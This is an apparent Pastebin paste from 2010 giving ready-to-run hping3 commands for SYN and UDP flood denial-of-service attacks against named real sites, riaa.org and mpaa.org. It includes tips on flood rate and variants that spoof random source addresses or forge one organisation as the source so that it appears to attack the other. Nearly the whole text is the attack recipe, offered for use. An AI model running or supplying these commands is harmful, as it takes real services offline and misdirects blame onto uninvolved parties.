- - Run hping as root!
- - To speed up the flood, lower the 'u100'
- - If your connection cannot handle 'u100', try 'u200', and so forth...
- - Using the --flood paramter is not recommended, as it will in most cases DoS your router/your own computer, and you will not be able to access the internet
- - Replace the -S with -U for a UDP flood
- ### Normal hping DoS attack:
- hping3 -S -i u100 riaa.org
- ### Spoofed random source address attack:
- hping3 -S -i u100 riaa.org --rand-source
- ### Reflected attack(it looks like mpaa.org is DoS'ing riaa.org)
- hping3 -S -i u100 riaa.org -a mpaa.org
- ### Reflected attack(it looks like riaa.org is DoS'ing mpaa.org)
- hping3 -S -i u100 mpaa.org -a riaa.org
a guest Sep 19th, 2010 6,828 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
RAW Paste Data